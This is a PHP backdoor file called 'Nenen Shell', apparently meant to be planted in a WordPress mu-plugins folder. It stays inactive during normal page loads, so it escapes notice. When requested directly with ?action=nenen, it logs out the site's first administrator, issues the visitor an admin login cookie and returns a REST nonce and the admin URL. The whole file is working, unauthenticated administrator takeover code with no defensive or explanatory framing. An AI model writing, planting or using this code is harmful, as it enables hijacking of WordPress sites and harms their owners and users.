<?php
/*
 * Nenen Shell — standalone mode only
 *
 * When placed in mu-plugins: ABSPATH is defined → shell does nothing.
 * When accessed directly via URL: ABSPATH not defined → bootstrap wp-load.php,
 * respond to ?action=nenen.
 *
 * Shell ONLY works on direct URL access. Does NOT interfere with other pages.
 */

if (defined('ABSPATH')) { return; }

define('WP_USE_THEMES', false);

if (!function_exists('load_wordpress_core')) {
    function load_wordpress_core(){
        $d = dirname(__FILE__);
        while ($d !== dirname($d) && !file_exists($d . '/wp-load.php')) {
            $d = dirname($d);
        }
        return file_exists($d . '/wp-load.php') ? $d : $_SERVER['DOCUMENT_ROOT'];
    }
}

require_once load_wordpress_core() . '/wp-load.php';

$__action = isset($_REQUEST['action']) ? $_REQUEST['action'] : '';
if ($__action === 'nenen') {
    $users = get_users(["role" => "administrator", "number" => 1]);
    if (empty($users)) {
        header('Content-Type: application/json');
        die(json_encode(["error" => "no_admin_found"]));
    }
    $user_id = $users[0]->data->ID;
    $tokens  = WP_Session_Tokens::get_instance($user_id);
    $tokens->destroy_all();
    wp_set_current_user($user_id);
    $current = wp_get_current_user();
    $current->for_site(get_current_blog_id());
    wp_set_auth_cookie($user_id, true);
    header('Content-Type: application/json');
    die(json_encode([
        "status"     => "ok",
        "user_id"    => (int)$user_id,
        "username"   => $current->user_login,
        "rest_nonce" => wp_create_nonce('wp_rest'),
        "is_admin"   => current_user_can('manage_options'),
        "admin_url"  => admin_url(),
    ]));
}

header('Content-Type: application/json');
die(json_encode(["message" => "Opss"]));